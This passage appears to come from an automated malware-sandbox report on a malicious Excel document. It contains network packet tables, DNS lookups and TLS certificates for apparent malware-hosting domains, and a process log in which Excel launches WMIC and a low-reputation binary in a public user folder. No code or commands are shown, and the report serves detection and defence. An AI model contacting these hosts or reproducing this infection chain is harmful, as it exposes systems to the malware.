Jun 10, 2021 19:29:43.593641996 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593655109 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593673944 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593679905 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593693018 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593698978 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593744040 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593754053 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593787909 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593801975 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593828917 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593853951 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593871117 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593875885 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593909979 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593928099 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593962908 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672254086 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672313929 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672349930 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672365904 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672389984 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672410011 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672415972 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672430038 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672449112 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672468901 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672497988 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672511101 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672522068 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672554016 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672568083 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672604084 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672606945 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672646999 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672655106 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672684908 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672698021 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672725916 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672734022 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672765017 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672780991 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672804117 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672816992 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672842979 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672852039 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672879934 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672894001 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672926903 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672930956 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672972918 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672985077 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.673012018 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.673027992 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.673051119 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.673064947 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.673100948 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751229048 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751271009 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751307011 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751346111 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751380920 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751396894 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751418114 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751431942 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751437902 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751441956 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751446009 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751455069 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751470089 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751499891 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751517057 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751539946 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751554012 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751576900 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751591921 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751615047 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751627922 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 10, 2021 19:29:26.869281054 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:26.919629097 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:27.712269068 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:27.767049074 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:30.299875021 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:30.350756884 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:31.149571896 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:31.202770948 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:31.946738005 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:31.999885082 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:32.823888063 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:32.877093077 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:35.992733955 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:36.043184996 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:38.526139975 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:38.576669931 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:39.581397057 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:39.675406933 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:40.068955898 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:40.119657993 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:40.349926949 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:40.421042919 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:41.355870008 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:41.429215908 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:42.421807051 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:42.480777979 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:43.004868031 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:43.055016994 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:43.196017981 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:43.256313086 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:44.098253012 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:44.148494005 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:44.418675900 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:44.477164030 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:45.140666962 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:45.190901995 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:46.281454086 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:46.301975012 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:46.346998930 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:46.363143921 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:47.237745047 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:47.299107075 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:48.465703011 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:48.524168968 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:49.064505100 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:49.116206884 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:51.561351061 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:51.613240957 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:52.787976980 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:52.838251114 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:53.757215023 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:53.807754040 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:04.632174969 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:04.693382978 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:23.215066910 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:23.276669979 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:55.990628958 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:56.051986933 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:56.819478989 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:56.886271000 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:31:12.039289951 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:31:12.111557961 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:31:25.904824018 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:31:25.966299057 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:31:32.244328022 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:31:32.305917025 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:02.641453028 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:02.709626913 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:04.067090988 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:04.145922899 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:22.280401945 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:22.575020075 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:24.563946009 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:24.622960091 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:25.961316109 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:26.097450018 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:26.903242111 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:26.965243101 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:27.928541899 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:27.978883028 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:28.978029966 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:29.038048029 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:31.757529974 CEST | 62938 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:31.817420959 CEST | 53 | 62938 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:33.720979929 CEST | 55708 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:33.779915094 CEST | 53 | 55708 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:35.097579002 CEST | 56803 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:35.157727003 CEST | 53 | 56803 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:35.949721098 CEST | 57145 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:36.010384083 CEST | 53 | 57145 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:40.719794989 CEST | 55359 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:40.779256105 CEST | 53 | 55359 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:21.674874067 CEST | 58306 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:21.744677067 CEST | 53 | 58306 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:22.191497087 CEST | 64124 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:22.265377045 CEST | 53 | 64124 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:25.343003988 CEST | 49361 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:25.412002087 CEST | 53 | 49361 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:29.503706932 CEST | 63150 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:29.564973116 CEST | 53 | 63150 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:29.899662018 CEST | 53279 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:29.963212013 CEST | 53 | 53279 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:37:29.134620905 CEST | 56881 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:37:29.206645966 CEST | 53 | 56881 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:37:32.832544088 CEST | 53642 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:37:32.912306070 CEST | 53 | 53642 | 8.8.8.8 | 192.168.2.3 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jun 10, 2021 19:29:51.613358021 CEST | 192.168.2.3 | 8.8.8.8 | d077 | (Port unreachable) | Destination Unreachable |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 10, 2021 19:29:43.196017981 CEST | 192.168.2.3 | 8.8.8.8 | 0x8251 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jun 10, 2021 19:29:46.281454086 CEST | 192.168.2.3 | 8.8.8.8 | 0x8f87 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 10, 2021 19:29:43.256313086 CEST | 8.8.8.8 | 192.168.2.3 | 0x8251 | No error (0) | 95.142.44.93 | A (IP address) | IN (0x0001) | ||
Jun 10, 2021 19:29:46.346998930 CEST | 8.8.8.8 | 192.168.2.3 | 0x8f87 | No error (0) | 193.178.169.243 | A (IP address) | IN (0x0001) | ||
Jun 10, 2021 19:30:56.051986933 CEST | 8.8.8.8 | 192.168.2.3 | 0x5e57 | No error (0) | www.tm.a.prd.aadg.akadns.net | CNAME (Canonical name) | IN (0x0001) | ||
Jun 10, 2021 19:34:21.744677067 CEST | 8.8.8.8 | 192.168.2.3 | 0xdb4b | No error (0) | www.tm.a.prd.aadg.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 10, 2021 19:29:43.417321920 CEST | 95.142.44.93 | 443 | 192.168.2.3 | 49724 | CN=pigeonious.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Tue Jun 08 15:19:13 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Mon Sep 06 15:19:13 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 | |||||||
Jun 10, 2021 19:29:46.487052917 CEST | 193.178.169.243 | 443 | 192.168.2.3 | 49727 | CN=injuryless.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu May 27 15:42:29 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Wed Aug 25 15:42:29 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 19:29:37 |
Start date: | 10/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12e0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:29:43 |
Start date: | 10/06/2021 |
Path: | C:\Windows\SysWOW64\wbem\WMIC.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x13c0000 |
File size: | 391680 bytes |
MD5 hash: | 79A01FCD1C8166C5642F37D1E0FB7BA8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:29:43 |
Start date: | 10/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2800000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:29:44 |
Start date: | 10/06/2021 |
Path: | C:\Users\Public\SettingSyncHost |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf90000 |
File size: | 511488 bytes |
MD5 hash: | 526D56017EF5105277FE0D366C95C39D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
Reputation: | low |
Disassembly |
---|
Code Analysis |
---|